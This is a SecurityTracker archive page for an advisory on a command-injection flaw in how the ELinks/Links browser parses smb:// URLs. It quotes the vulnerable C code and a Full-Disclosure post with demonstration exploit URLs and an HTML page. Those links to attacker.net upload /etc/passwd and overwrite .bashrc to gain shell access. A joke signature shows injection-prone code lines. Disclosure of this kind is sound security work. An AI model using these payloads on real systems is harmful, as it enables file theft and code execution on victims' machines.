SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   ELinks Vendors:   elinks.or.cz
ELinks SMB URL Parsing Bug Lets Remote Users Upload/Download Files
SecurityTracker Alert ID:  1017232
SecurityTracker URL:  http://securitytracker.com/id/1017232
CVE Reference:   CVE-2006-5925   (Links to External Site)
Date:  Nov 15 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.11.1
Description:   A vulnerability was reported in ELinks. A remote user can cause arbitrary smbclient commands to be executed.

The smbclient code does not properly parse SMB URLs. A remote user can create HTML with a specially crafted URL that, when loaded by the target user, will upload files to or download files from the target user's system.

Some demonstration exploit URLs are provided:

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit;

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit;

Teemu Salmela reported this vulnerability.

Impact:   A remote user can obtain files from or create files on the target user's system.
Solution:   No upstream solution was available at the time of this entry.
Vendor URL:  elinks.or.cz/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 15 2006 (Red Hat Issues Fix) ELinks SMB URL Parsing Bug Lets Remote Users Upload/Download Files
Red Hat has released a fix for Red Hat Enterprise Linux 4.



 Source Message Contents

Subject:  [Full-disclosure] Links smbclient command execution


Links smbclient command execution
-----------------------------------------------------------------------------
There is a flaw in the Links web browser, that allows malicious web sites to
execute smbclient commands on the victim's machine. This flaw makes it
possible to read any file from the victim system (any file that the user
running links has read access), or to upload any file to the victim system
(any file that the user running links can create/overwrite).  The attacker
could, for example, upload ~/.bashrc to gain shell access.

Version numbers:
-----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also
be installed.

Vulnerable code:
-----------------------------------------------------------------------------
smb_func() in smb.c:
    ...
    143                 if (*share) {
    144                         if (!*dir || dir[strlen(dir) - 1] == '/' 
|| dir[strlen(dir) - 1] == '\\') {
    145                                 if (dir) {
    146                                         v[n++] = "-D";
    147                                         v[n++] = dir;
    148                                 }
    149                                 v[n++] = "-c";
    150                                 v[n++] = "ls";
    151                         } else {
    152                                 unsigned char *ss;
    153                                 unsigned char *s = stracpy("get 
\"");
'dir' is the directory part of the smb://.. url:
    154                                 add_to_strn(&s, dir);
    155                                 add_to_strn(&s, "\" -");
    156                                 while ((ss = strchr(s, '/'))) 
*ss = '\\';
    157                                 v[n++] = "-c";
    158                                 v[n++] = s;
    159                         }
    160                 }
    161                 v[n++] = NULL;
smbclient is executed:
    162                 execvp("smbclient", (char **)v);
    163                 fprintf(stderr, "smbclient not found in $PATH");
    164                 _exit(1);
    ...

Exploit:
-----------------------------------------------------------------------------
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd 
etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd 
home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>

-- 
fscanf(socket,"%s",buf); printf(buf);
sprintf(query, "SELECT %s FROM table", buf);
sprintf(cmd, "echo %s | sqlquery", query); system(cmd);
Teemu Salmela 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC